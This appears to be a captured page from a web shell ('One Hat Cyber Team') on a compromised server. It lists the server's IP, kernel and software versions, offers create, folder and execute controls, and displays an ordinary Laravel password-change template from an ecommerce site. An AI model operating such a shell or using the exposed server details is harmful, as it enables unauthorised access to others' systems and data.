⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
ecommerce.dev-unit.com
/
views
/
user
/
auth
/
View File Name :
changepass.blade.php
@extends('master.back-login') @section('content') <div class="wrapper wrapper-login"> <div class="container container-login animated fadeIn"> <h3 class="text-center">{{ __('Change Password') }}</h3> <div class="login-form"> <form action="{{ route('user.change.password') }}" method="POST"> @csrf @include('alerts.alerts') <div class="form-group form-floating-label"> <input id="new_password" name="new_password" type="password" class="form-control input-border-bottom" > <label for="new_password" class="placeholder">{{ __('New Password') }}</label> </div> <div class="form-group form-floating-label"> <input id="renew_password" name="renew_password" type="password" class="form-control input-border-bottom" > <label for="renew_password" class="placeholder">{{ __('Re-Type New Password') }}</label> </div> <input type="hidden" name="file_token" value="{{ $token }}"> <div class="form-action mb-3"> <button type="submit" class="btn btn-secondary btn-login">{{ __('Change Password') }}</button> </div> </form> </div> </div> </div> @endsection